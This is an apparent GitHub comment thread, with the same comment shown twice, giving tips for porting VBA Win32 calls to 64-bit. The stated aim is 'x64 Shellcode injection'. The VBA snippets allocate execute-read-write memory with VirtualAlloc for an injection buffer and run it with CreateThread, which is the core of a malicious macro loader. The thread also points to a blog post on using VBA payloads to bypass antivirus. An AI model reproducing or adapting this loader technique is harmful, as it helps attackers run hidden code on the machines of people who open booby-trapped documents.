Just wanted to post this here in case anyone was wondering how to add x64 support. Essentially, you should replace all x86 "Long" pointer types with "LongPtr" types. This vbtype will automatically select the "Long" for x86 and "LongLong" for x64. Do not just blindly replace Long, but look at the Win32 API specification and convert types appropriately. If a Win32 API parameter or result is not a pointer, it should not be converted to "LongLong" and therefore "LongPtr" should not be used.
Dim allocatedAddr As LongPtr ' Long or LongLong depending on architecture
#If Win64 Then
allocatedAddr = IndirectWin32Call("kernel32", "VirtualAlloc", vbLongLong, 0&, UBound(buffToInject), &H1000, &H40) ' vbLongLong is mandatory as returned address is 64bit
...
Dim nullValue as LongPtr ' Or instead use 0^ for LongLong zero directly as function argument
nullValue = 0
result = IndirectWin32Call("kernel32", "CreateThread", vbLong, nullValue, nullValue, allocatedAddr, nullValue, 0, nullValue) 'DispCallFunc needs precise type for arguments. LongLong zero is not the same as Long zero.
This information helped me a lot for x64 Shellcode injection. I hope this makes it less time-consuming for other people in the future.
aress31
commented
2 years ago
Hi guys,
Just wanted to post this here in case anyone was wondering how to add x64 support. Essentially, you should replace all x86 "Long" pointer types with "LongPtr" types. This vbtype will automatically select the "Long" for x86 and "LongLong" for x64. Do not just blindly replace Long, but look at the Win32 API specification and convert types appropriately. If a Win32 API parameter or result is not a pointer, it should not be converted to "LongLong" and therefore "LongPtr" should not be used.
The following example could help: https://gist.github.com/rmdavy/43ce9872080a2a37fe54a10a6d9b0f1c Also take into consideration the following from Sevagas' blog on MacroPack Pro https://blog.sevagas.com/Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads :
This information helped me a lot for x64 Shellcode injection. I hope this makes it less time-consuming for other people in the future.